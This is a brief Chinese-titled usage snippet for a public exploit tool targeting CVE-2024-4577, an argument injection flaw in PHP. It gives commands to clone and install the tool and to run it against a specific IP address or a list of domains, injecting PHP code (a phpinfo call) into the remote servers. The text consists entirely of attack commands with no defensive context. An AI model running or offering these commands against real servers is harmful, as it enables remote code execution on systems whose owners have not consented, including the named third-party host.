PHP中的参数注入漏洞
git clone https://github.com/gotr00t0day/CVE-2024-4577.git
cd CVE-2024-4577
pip3 install -r requirements.txt
# 扫描单个目标
python3 CVE-2024-4577.py -t https://160.153.61.66/ -c "<?phpphpinfo();?>"
# 扫描目标列表
python3 CVE-2024-4577.py -f domains.txt -c "<?phpphpinfo();?>"